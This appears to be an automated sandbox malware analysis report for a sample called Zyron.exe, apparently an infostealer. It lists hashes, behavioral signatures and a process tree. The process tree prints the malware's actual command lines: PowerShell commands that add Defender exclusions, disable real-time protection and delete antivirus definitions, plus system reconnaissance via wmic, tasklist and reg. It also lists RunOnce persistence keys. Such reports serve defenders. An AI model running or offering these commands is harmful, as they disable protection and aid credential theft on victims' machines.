Overview
overview
10Static
static
10Grabbers-D...obf.py
windows11-21h2-x64
3Grabbers-D...ben.py
windows11-21h2-x64
3Grabbers-D...ank.py
windows11-21h2-x64
3Grabbers-D...ean.py
windows11-21h2-x64
3Grabbers-D...una.py
windows11-21h2-x64
3Grabbers-D...obf.py
windows11-21h2-x64
3Grabbers-D...her.py
windows11-21h2-x64
3Grabbers-D...er.jar
windows11-21h2-x64
7Grabbers-D...pycdas
windows11-21h2-x64
1Grabbers-D...as.exe
windows11-21h2-x64
1Grabbers-D.../pycdc
windows11-21h2-x64
1Grabbers-D...dc.exe
windows11-21h2-x64
1Grabbers-D...in/upx
windows11-21h2-x64
7Grabbers-D...px.exe
windows11-21h2-x64
7Grabbers-D...fig.py
windows11-21h2-x64
3Grabbers-D...ile.py
windows11-21h2-x64
3Grabbers-D...ion.py
windows11-21h2-x64
3Grabbers-D...lay.py
windows11-21h2-x64
3Grabbers-D...oad.py
windows11-21h2-x64
3Grabbers-D...t__.py
windows11-21h2-x64
3Grabbers-D...aes.py
windows11-21h2-x64
3Grabbers-D...der.py
windows11-21h2-x64
3Grabbers-D...til.py
windows11-21h2-x64
3Grabbers-D...tor.py
windows11-21h2-x64
3Grabbers-D...rng.py
windows11-21h2-x64
3Grabbers-D...ler.py
windows11-21h2-x64
3Grabbers-D...ons.py
windows11-21h2-x64
3Grabbers-D...ram.py
windows11-21h2-x64
3Grabbers-D...mer.py
windows11-21h2-x64
3Zyron.exe
windows11-21h2-x64
10Analysis
-
max time kernel
1800s -
max time network
1337s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
31-05-2024 17:38
Behavioral task
behavioral1
Sample
Grabbers-Deobfuscator-main/deobf.py
Resource
win11-20240508-en
Behavioral task
behavioral2
Sample
Grabbers-Deobfuscator-main/methods/ben.py
Resource
win11-20240508-en
Behavioral task
behavioral3
Sample
Grabbers-Deobfuscator-main/methods/blank.py
Resource
win11-20240508-en
Behavioral task
behavioral4
Sample
Grabbers-Deobfuscator-main/methods/empyrean.py
Resource
win11-20240426-en
Behavioral task
behavioral5
Sample
Grabbers-Deobfuscator-main/methods/luna.py
Resource
win11-20240508-en
Behavioral task
behavioral6
Sample
Grabbers-Deobfuscator-main/methods/notobf.py
Resource
win11-20240508-en
Behavioral task
behavioral7
Sample
Grabbers-Deobfuscator-main/methods/other.py
Resource
win11-20240419-en
Behavioral task
behavioral8
Sample
Grabbers-Deobfuscator-main/utils/bin/fernflower.jar
Resource
win11-20240426-en
Behavioral task
behavioral9
Sample
Grabbers-Deobfuscator-main/utils/bin/pycdas
Resource
win11-20240426-en
Behavioral task
behavioral10
Sample
Grabbers-Deobfuscator-main/utils/bin/pycdas.exe
Resource
win11-20240426-en
Behavioral task
behavioral11
Sample
Grabbers-Deobfuscator-main/utils/bin/pycdc
Resource
win11-20240508-en
Behavioral task
behavioral12
Sample
Grabbers-Deobfuscator-main/utils/bin/pycdc.exe
Resource
win11-20240508-en
Behavioral task
behavioral13
Sample
Grabbers-Deobfuscator-main/utils/bin/upx
Resource
win11-20240508-en
Behavioral task
behavioral14
Sample
Grabbers-Deobfuscator-main/utils/bin/upx.exe
Resource
win11-20240426-en
Behavioral task
behavioral15
Sample
Grabbers-Deobfuscator-main/utils/config.py
Resource
win11-20240426-en
Behavioral task
behavioral16
Sample
Grabbers-Deobfuscator-main/utils/decompile.py
Resource
win11-20240508-en
Behavioral task
behavioral17
Sample
Grabbers-Deobfuscator-main/utils/deobfuscation.py
Resource
win11-20240426-en
Behavioral task
behavioral18
Sample
Grabbers-Deobfuscator-main/utils/display.py
Resource
win11-20240508-en
Behavioral task
behavioral19
Sample
Grabbers-Deobfuscator-main/utils/download.py
Resource
win11-20240426-en
Behavioral task
behavioral20
Sample
Grabbers-Deobfuscator-main/utils/pyaes/__init__.py
Resource
win11-20240508-en
Behavioral task
behavioral21
Sample
Grabbers-Deobfuscator-main/utils/pyaes/aes.py
Resource
win11-20240426-en
Behavioral task
behavioral22
Sample
Grabbers-Deobfuscator-main/utils/pyaes/blockfeeder.py
Resource
win11-20240508-en
Behavioral task
behavioral23
Sample
Grabbers-Deobfuscator-main/utils/pyaes/util.py
Resource
win11-20240426-en
Behavioral task
behavioral24
Sample
Grabbers-Deobfuscator-main/utils/pyinstaller/extractors/pyinstxtractor.py
Resource
win11-20240426-en
Behavioral task
behavioral25
Sample
Grabbers-Deobfuscator-main/utils/pyinstaller/extractors/pyinstxtractorng.py
Resource
win11-20240508-en
Behavioral task
behavioral26
Sample
Grabbers-Deobfuscator-main/utils/pyinstaller/pyinstaller.py
Resource
win11-20240426-en
Behavioral task
behavioral27
Sample
Grabbers-Deobfuscator-main/utils/pyinstaller/pyinstallerExceptions.py
Resource
win11-20240426-en
Behavioral task
behavioral28
Sample
Grabbers-Deobfuscator-main/utils/telegram.py
Resource
win11-20240508-en
Behavioral task
behavioral29
Sample
Grabbers-Deobfuscator-main/utils/webhookspammer.py
Resource
win11-20240426-en
General
-
Target
Zyron.exe
-
Size
20.1MB
-
MD5
c93e65b8b3bdf4651aa5f33fbaf6487d
-
SHA1
fa44cc02066d7e384224ce22ea2c7e37604e6d17
-
SHA256
a8474496d6a2d25d7e3c34cb41e22417b59ca58f7c94b514492a85bbcb969f30
-
SHA512
2ab77d13631d77774bafbc9ad70854fd1c31c3ade62e11ec872b6dd05baa9996c5408ddbe822a714f25ba893bc34839d23cc6cb41394d02bfa38f422c06076cd
-
SSDEEP
196608:Jri7DEziLjv+bhqNVoB8Ck5c7GpNlpq41J29bk9qtlDfqWf:YTL+9qz88Ck+7q3p91JBqfqWf
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 3136 powershell.exe 4872 powershell.exe 4088 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exezyron.exe attrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts zyron.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 8 IoCs
Processes:
zyron.exe zyron.exe rar.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exepid process 2904 zyron.exe 4868 zyron.exe 3160 rar.exe 3972 icsys.icn.exe 4200 explorer.exe 676 spoolsv.exe 4736 svchost.exe 212 spoolsv.exe -
Loads dropped DLL 17 IoCs
Processes:
zyron.exepid process 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe 4868 zyron.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI29042\python312.dll upx behavioral30/memory/4868-35-0x00007FF94CF60000-0x00007FF94D638000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\_ssl.pyd upx behavioral30/memory/4868-58-0x00007FF9638B0000-0x00007FF9638BF000-memory.dmp upx behavioral30/memory/4868-57-0x00007FF95EDB0000-0x00007FF95EDD5000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI29042\libcrypto-3.dll upx behavioral30/memory/4868-64-0x00007FF95ECA0000-0x00007FF95ECCD000-memory.dmp upx behavioral30/memory/4868-66-0x00007FF95EF60000-0x00007FF95EF79000-memory.dmp upx behavioral30/memory/4868-68-0x00007FF95EA50000-0x00007FF95EA74000-memory.dmp upx behavioral30/memory/4868-70-0x00007FF94CDE0000-0x00007FF94CF56000-memory.dmp upx behavioral30/memory/4868-72-0x00007FF95E010000-0x00007FF95E029000-memory.dmp upx behavioral30/memory/4868-74-0x00007FF961C10000-0x00007FF961C1D000-memory.dmp upx behavioral30/memory/4868-78-0x00007FF94CD10000-0x00007FF94CDDD000-memory.dmp upx behavioral30/memory/4868-77-0x00007FF95DFD0000-0x00007FF95E003000-memory.dmp upx behavioral30/memory/4868-81-0x00007FF94CF60000-0x00007FF94D638000-memory.dmp upx behavioral30/memory/4868-82-0x00007FF94C7E0000-0x00007FF94CD02000-memory.dmp upx behavioral30/memory/4868-86-0x00007FF95DFB0000-0x00007FF95DFC4000-memory.dmp upx behavioral30/memory/4868-85-0x00007FF95EDB0000-0x00007FF95EDD5000-memory.dmp upx behavioral30/memory/4868-88-0x00007FF961A90000-0x00007FF961A9D000-memory.dmp upx behavioral30/memory/4868-90-0x00007FF94C6C0000-0x00007FF94C7DB000-memory.dmp upx behavioral30/memory/4868-226-0x00007FF95EA50000-0x00007FF95EA74000-memory.dmp upx behavioral30/memory/4868-285-0x00007FF94CDE0000-0x00007FF94CF56000-memory.dmp upx behavioral30/memory/4868-293-0x00007FF95E010000-0x00007FF95E029000-memory.dmp upx behavioral30/memory/4868-305-0x00007FF95DFD0000-0x00007FF95E003000-memory.dmp upx behavioral30/memory/4868-320-0x00007FF94CD10000-0x00007FF94CDDD000-memory.dmp upx behavioral30/memory/4868-324-0x00007FF94C7E0000-0x00007FF94CD02000-memory.dmp upx behavioral30/memory/4868-341-0x00007FF95EDB0000-0x00007FF95EDD5000-memory.dmp upx behavioral30/memory/4868-346-0x00007FF94CDE0000-0x00007FF94CF56000-memory.dmp upx behavioral30/memory/4868-354-0x00007FF94C6C0000-0x00007FF94C7DB000-memory.dmp upx behavioral30/memory/4868-340-0x00007FF94CF60000-0x00007FF94D638000-memory.dmp upx behavioral30/memory/4868-374-0x00007FF94CD10000-0x00007FF94CDDD000-memory.dmp upx behavioral30/memory/4868-373-0x00007FF95DFD0000-0x00007FF95E003000-memory.dmp upx behavioral30/memory/4868-385-0x00007FF95EA50000-0x00007FF95EA74000-memory.dmp upx behavioral30/memory/4868-384-0x00007FF95EF60000-0x00007FF95EF79000-memory.dmp upx behavioral30/memory/4868-383-0x00007FF95ECA0000-0x00007FF95ECCD000-memory.dmp upx behavioral30/memory/4868-382-0x00007FF9638B0000-0x00007FF9638BF000-memory.dmp upx behavioral30/memory/4868-381-0x00007FF95EDB0000-0x00007FF95EDD5000-memory.dmp upx behavioral30/memory/4868-380-0x00007FF94CF60000-0x00007FF94D638000-memory.dmp upx behavioral30/memory/4868-379-0x00007FF95DFB0000-0x00007FF95DFC4000-memory.dmp upx behavioral30/memory/4868-378-0x00007FF94C6C0000-0x00007FF94C7DB000-memory.dmp upx behavioral30/memory/4868-377-0x00007FF961A90000-0x00007FF961A9D000-memory.dmp upx behavioral30/memory/4868-375-0x00007FF94C7E0000-0x00007FF94CD02000-memory.dmp upx behavioral30/memory/4868-370-0x00007FF94CDE0000-0x00007FF94CF56000-memory.dmp upx behavioral30/memory/4868-372-0x00007FF961C10000-0x00007FF961C1D000-memory.dmp upx behavioral30/memory/4868-371-0x00007FF95E010000-0x00007FF95E029000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
svchost.exeexplorer.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
explorer.exesvchost.exedescription ioc process File opened for modification C:\Windows\SysWOW64\explorer.exe explorer.exe File opened for modification C:\Windows\SysWOW64\explorer.exe svchost.exe -
Drops file in Windows directory 6 IoCs
Processes:
explorer.exeZyron.exeicsys.icn.exespoolsv.exedescription ioc process File opened for modification C:\Windows\Resources\Themes\tjcm.cmn explorer.exe File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe Zyron.exe File opened for modification \??\c:\windows\resources\themes\explorer.exe icsys.icn.exe File opened for modification \??\c:\windows\resources\spoolsv.exe explorer.exe File opened for modification \??\c:\windows\resources\svchost.exe spoolsv.exe File opened for modification C:\Windows\Resources\tjud.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 3040 WMIC.exe 1352 WMIC.exe 1888 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 2020 tasklist.exe 1924 tasklist.exe 436 tasklist.exe 2432 tasklist.exe 4824 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Zyron.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeicsys.icn.exepid process 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3880 Zyron.exe 3136 powershell.exe 4688 powershell.exe 3136 powershell.exe 4688 powershell.exe 4872 powershell.exe 4872 powershell.exe 2964 powershell.exe 2964 powershell.exe 2964 powershell.exe 4088 powershell.exe 4088 powershell.exe 4088 powershell.exe 1212 powershell.exe 1212 powershell.exe 360 powershell.exe 360 powershell.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 3972 icsys.icn.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
explorer.exesvchost.exepid process 4200 explorer.exe 4736 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exepowershell.exeWMIC.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 436 tasklist.exe Token: SeDebugPrivilege 3136 powershell.exe Token: SeIncreaseQuotaPrivilege 4344 WMIC.exe Token: SeSecurityPrivilege 4344 WMIC.exe Token: SeTakeOwnershipPrivilege 4344 WMIC.exe Token: SeLoadDriverPrivilege 4344 WMIC.exe Token: SeSystemProfilePrivilege 4344 WMIC.exe Token: SeSystemtimePrivilege 4344 WMIC.exe Token: SeProfSingleProcessPrivilege 4344 WMIC.exe Token: SeIncBasePriorityPrivilege 4344 WMIC.exe Token: SeCreatePagefilePrivilege 4344 WMIC.exe Token: SeBackupPrivilege 4344 WMIC.exe Token: SeRestorePrivilege 4344 WMIC.exe Token: SeShutdownPrivilege 4344 WMIC.exe Token: SeDebugPrivilege 4344 WMIC.exe Token: SeSystemEnvironmentPrivilege 4344 WMIC.exe Token: SeRemoteShutdownPrivilege 4344 WMIC.exe Token: SeUndockPrivilege 4344 WMIC.exe Token: SeManageVolumePrivilege 4344 WMIC.exe Token: 33 4344 WMIC.exe Token: 34 4344 WMIC.exe Token: 35 4344 WMIC.exe Token: 36 4344 WMIC.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeIncreaseQuotaPrivilege 4344 WMIC.exe Token: SeSecurityPrivilege 4344 WMIC.exe Token: SeTakeOwnershipPrivilege 4344 WMIC.exe Token: SeLoadDriverPrivilege 4344 WMIC.exe Token: SeSystemProfilePrivilege 4344 WMIC.exe Token: SeSystemtimePrivilege 4344 WMIC.exe Token: SeProfSingleProcessPrivilege 4344 WMIC.exe Token: SeIncBasePriorityPrivilege 4344 WMIC.exe Token: SeCreatePagefilePrivilege 4344 WMIC.exe Token: SeBackupPrivilege 4344 WMIC.exe Token: SeRestorePrivilege 4344 WMIC.exe Token: SeShutdownPrivilege 4344 WMIC.exe Token: SeDebugPrivilege 4344 WMIC.exe Token: SeSystemEnvironmentPrivilege 4344 WMIC.exe Token: SeRemoteShutdownPrivilege 4344 WMIC.exe Token: SeUndockPrivilege 4344 WMIC.exe Token: SeManageVolumePrivilege 4344 WMIC.exe Token: 33 4344 WMIC.exe Token: 34 4344 WMIC.exe Token: 35 4344 WMIC.exe Token: 36 4344 WMIC.exe Token: SeIncreaseQuotaPrivilege 3040 WMIC.exe Token: SeSecurityPrivilege 3040 WMIC.exe Token: SeTakeOwnershipPrivilege 3040 WMIC.exe Token: SeLoadDriverPrivilege 3040 WMIC.exe Token: SeSystemProfilePrivilege 3040 WMIC.exe Token: SeSystemtimePrivilege 3040 WMIC.exe Token: SeProfSingleProcessPrivilege 3040 WMIC.exe Token: SeIncBasePriorityPrivilege 3040 WMIC.exe Token: SeCreatePagefilePrivilege 3040 WMIC.exe Token: SeBackupPrivilege 3040 WMIC.exe Token: SeRestorePrivilege 3040 WMIC.exe Token: SeShutdownPrivilege 3040 WMIC.exe Token: SeDebugPrivilege 3040 WMIC.exe Token: SeSystemEnvironmentPrivilege 3040 WMIC.exe Token: SeRemoteShutdownPrivilege 3040 WMIC.exe Token: SeUndockPrivilege 3040 WMIC.exe Token: SeManageVolumePrivilege 3040 WMIC.exe Token: 33 3040 WMIC.exe Token: 34 3040 WMIC.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
Zyron.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exepid process 3880 Zyron.exe 3880 Zyron.exe 3972 icsys.icn.exe 3972 icsys.icn.exe 4200 explorer.exe 4200 explorer.exe 676 spoolsv.exe 676 spoolsv.exe 4736 svchost.exe 4736 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Zyron.exezyron.exe zyron.exe cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3880 wrote to memory of 2904 3880 Zyron.exe zyron.exe PID 3880 wrote to memory of 2904 3880 Zyron.exe zyron.exe PID 2904 wrote to memory of 4868 2904 zyron.exe zyron.exe PID 2904 wrote to memory of 4868 2904 zyron.exe zyron.exe PID 4868 wrote to memory of 2068 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 2068 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 1836 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 1836 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 1748 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 1748 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 1800 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 1800 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 3940 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 3940 4868 zyron.exe cmd.exe PID 1800 wrote to memory of 436 1800 cmd.exe tasklist.exe PID 1800 wrote to memory of 436 1800 cmd.exe tasklist.exe PID 1836 wrote to memory of 4688 1836 cmd.exe powershell.exe PID 1836 wrote to memory of 4688 1836 cmd.exe powershell.exe PID 2068 wrote to memory of 3136 2068 cmd.exe powershell.exe PID 2068 wrote to memory of 3136 2068 cmd.exe powershell.exe PID 1748 wrote to memory of 1464 1748 cmd.exe mshta.exe PID 1748 wrote to memory of 1464 1748 cmd.exe mshta.exe PID 3940 wrote to memory of 4344 3940 cmd.exe WMIC.exe PID 3940 wrote to memory of 4344 3940 cmd.exe WMIC.exe PID 4868 wrote to memory of 2648 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 2648 4868 zyron.exe cmd.exe PID 2648 wrote to memory of 1580 2648 cmd.exe reg.exe PID 2648 wrote to memory of 1580 2648 cmd.exe reg.exe PID 4868 wrote to memory of 4412 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 4412 4868 zyron.exe cmd.exe PID 4412 wrote to memory of 1544 4412 cmd.exe reg.exe PID 4412 wrote to memory of 1544 4412 cmd.exe reg.exe PID 4868 wrote to memory of 5084 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 5084 4868 zyron.exe cmd.exe PID 5084 wrote to memory of 3040 5084 cmd.exe WMIC.exe PID 5084 wrote to memory of 3040 5084 cmd.exe WMIC.exe PID 4868 wrote to memory of 2556 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 2556 4868 zyron.exe cmd.exe PID 2556 wrote to memory of 1352 2556 cmd.exe WMIC.exe PID 2556 wrote to memory of 1352 2556 cmd.exe WMIC.exe PID 4868 wrote to memory of 1648 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 1648 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 3736 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 3736 4868 zyron.exe cmd.exe PID 1648 wrote to memory of 4172 1648 cmd.exe attrib.exe PID 1648 wrote to memory of 4172 1648 cmd.exe attrib.exe PID 3736 wrote to memory of 4872 3736 cmd.exe powershell.exe PID 3736 wrote to memory of 4872 3736 cmd.exe powershell.exe PID 4868 wrote to memory of 4600 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 4600 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 3808 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 3808 4868 zyron.exe cmd.exe PID 3808 wrote to memory of 4824 3808 cmd.exe tasklist.exe PID 3808 wrote to memory of 4824 3808 cmd.exe tasklist.exe PID 4600 wrote to memory of 2432 4600 cmd.exe tasklist.exe PID 4600 wrote to memory of 2432 4600 cmd.exe tasklist.exe PID 4868 wrote to memory of 4756 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 4756 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 788 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 788 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 3288 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 3288 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 3016 4868 zyron.exe cmd.exe PID 4868 wrote to memory of 3016 4868 zyron.exe cmd.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 900 attrib.exe 4172 attrib.exe 2388 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Zyron.exe"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3880 -
\??\c:\users\admin\appdata\local\temp\zyron.exec:\users\admin\appdata\local\temp\zyron.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2904 -
\??\c:\users\admin\appdata\local\temp\zyron.exec:\users\admin\appdata\local\temp\zyron.exe3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '"4⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3136 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4688 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()""4⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()"5⤵PID:1464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:436 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵PID:1580
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵PID:1544
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3040 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
